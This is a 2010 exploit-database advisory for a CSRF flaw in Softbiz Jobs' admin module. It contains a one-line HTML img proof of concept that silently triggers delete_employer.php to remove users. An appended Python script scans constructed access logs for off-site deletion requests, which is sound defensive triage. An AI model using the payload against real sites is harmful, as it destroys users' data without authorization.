0day Today Exploits Market and 0day Exploits Database

Softbiz Jobs CSRF Vulnerability

Author: Pratul Agrawal
Risk: Security Risk Unsorted
0day-ID: 0day-ID-11037
Category: web applications
Date added: 23-02-2010
Platform: unsorted
                     =======================================================================
  
                                         Softbiz Jobs CSRF Vulnerability
                     =======================================================================
  
                                                     by
  
                                               Pratul Agrawal
  
  
# Vulnerability found in: Admin module
# Company:    aksitservices
# Credit by:  Pratul Agrawal
# Download:   http://www.softbizscripts.com/
# Script:     softbizscripts

# Proof of concept
 
Script to delete a registered user through cross-site request forgery (CSRF):
 
...................................................................................................................

<html>
  <body>
    <img src=http://server/scripts/seojobs/admin/delete_employer.php?id=[USER ID] />
  </body>
</html>

...................................................................................................................
 
 
 
After execution, refresh the page and you can see that the user having id=20 gets deleted automatically.
 
  
#If you have any questions, comments, or concerns, feel free to contact me. 
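
For server-side triage, the following added example (not part of the original advisory) scans Apache combined-format access logs for GET requests to the `delete_employer.php` path from the proof of concept whose Referer is missing or off-site, which is how a request triggered by an `<img>` tag on another page appears. The log lines and the host names `jobs.example.com` and `forum.example.net` are constructed, and the combined log format is an assumption about the deployment.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache "combined" format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [23/Feb/2010:10:01:12 +0000] "GET /scripts/seojobs/admin/delete_employer.php?id=20 HTTP/1.1" 200 512 "http://forum.example.net/thread/99" "Mozilla/5.0"
203.0.113.7 - - [23/Feb/2010:10:05:40 +0000] "GET /scripts/seojobs/admin/delete_employer.php?id=21 HTTP/1.1" 200 512 "http://jobs.example.com/scripts/seojobs/admin/employers.php" "Mozilla/5.0"
203.0.113.7 - - [23/Feb/2010:10:07:02 +0000] "GET /scripts/seojobs/admin/delete_employer.php?id=22 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.4 - - [23/Feb/2010:10:09:30 +0000] "GET /scripts/seojobs/index.php HTTP/1.1" 200 4096 "http://forum.example.net/" "Mozilla/5.0"
"""

# ip, ident, user, [time], "METHOD target proto", status, bytes, "referer", "agent"
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "[^"]*"$'
)

def suspicious_deletes(log_text, site_host, endpoint="/admin/delete_employer.php"):
    """Return GET hits on the delete endpoint whose Referer is absent or off-site."""
    findings = []
    for line in log_text.splitlines():
        m = COMBINED.match(line)
        if not m or m["method"] != "GET":
            continue
        url = urlsplit(m["target"])
        if not url.path.endswith(endpoint):
            continue
        ref = m["referer"]
        ref_host = urlsplit(ref).hostname if ref not in ("", "-") else None
        if ref_host == site_host.lower():
            continue  # request came from the site's own admin pages
        findings.append({
            "time": m["ts"],
            "client": m["ip"],
            "user_id": parse_qs(url.query).get("id", [None])[0],
            "status": int(m["status"]),
            "reason": "no Referer" if ref_host is None
                      else f"off-site Referer {ref_host}",
        })
    return findings

if __name__ == "__main__":
    for finding in suspicious_deletes(SAMPLE_LOG, "jobs.example.com"):
        print(finding)
```

A missing Referer also occurs on typed or bookmarked URLs, so treat each finding as a lead to compare against deletions the administrator did not intend.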


